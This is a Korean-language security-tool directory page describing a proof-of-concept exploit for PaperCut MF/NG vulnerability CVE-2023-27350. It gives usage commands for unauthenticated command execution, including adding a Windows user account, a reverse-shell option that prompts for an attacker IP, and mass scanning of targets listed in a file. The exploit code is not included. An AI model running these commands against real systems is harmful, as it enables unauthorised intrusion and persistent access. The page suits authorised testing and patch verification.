Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-27350 — Papercut CVE-2023-27350에 대한 익스플로잇. [+] 리버스 셸 [+] 대량 검사 | Kitploit
도구/GitHubGitHub/adhikara13/cve-2023-27350
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubadhikara13/cve-2023-27350

CVE-2023-27350

Papercut CVE-2023-27350에 대한 익스플로잇. [+] 리버스 셸 [+] 대량 검사

저장소 보기
933년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-27350 익스플로잇 PoC

이는 PaperCut MF/NG에서 발견된 취약점 CVE-2023-27350에 대한 개념 증명(PoC) 익스플로잇입니다. 인증되지 않은 공격자가 SYSTEM 권한으로 임의 코드를 실행할 수 있게 합니다.

요구 사항

이 익스플로잇을 사용하기 전에 다음 라이브러리가 설치되어 있는지 확인하십시오:

root@kitploit:~
pip install -r requirements.txt

사용법

root@kitploit:~
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]

옵션

  • -u, --url: 대상 PaperCut MF/NG 애플리케이션의 URL (예: http://target-ip:9191).
  • -c, --command: 대상 시스템에서 실행할 명령어.
  • --reverse-shell: 대상 시스템에서 명령어를 실행하기 위해 리버스 셸 페이로드를 사용합니다.
  • -f, --file: 파일에서 여러 대상 확인 (예: file.txt).

예제

명령어 실행

대상 시스템에서 명령어를 실행하려면 -c 옵션을 사용하십시오:

root@kitploit:~
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"

리버스 셸

대상 시스템에서 명령어를 실행하기 위해 리버스 셸 페이로드를 사용하려면 --reverse-shell 옵션을 사용하십시오. IP 주소와 포트 번호를 입력하라는 메시지가 표시됩니다:

root@kitploit:~
: : <> : <>

대량 확인

파일에서 여러 대상을 확인하려면 -f 옵션을 사용하십시오. 파일 형식은 ip_address:port여야 합니다:

root@kitploit:~
python CVE-2023-27350.py -f file.txt

file.txt 형식 지정

file.txt 입력으로 대량 확인 옵션을 사용할 때 파일 내용이 올바르게 형식화되어 있는지 확인하십시오.

파일의 각 줄은 콜론(:)으로 구분된 대상의 IP 주소와 포트 번호를 포함해야 합니다. 예:

root@kitploit:~
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080

IP 주소, 콜론, 포트 번호 사이에 추가 공백이나 문자가 없어야 합니다. 또한 각 줄에는 하나의 IP 주소와 포트 번호만 포함되어야 합니다.

크레딧

이 저장소는 horizon3ai/CVE-2023-27350의 포크 버전입니다. 원본 익스플로잇에 대한 모든 크레딧은 해당 작성자에게 있습니다.

도구 다운로드
python
exploit
.py
-u
http
//target-ip:9191 --reverse-shell
Enter
your
IP
address
attacker-ip
Enter
your
port
number
port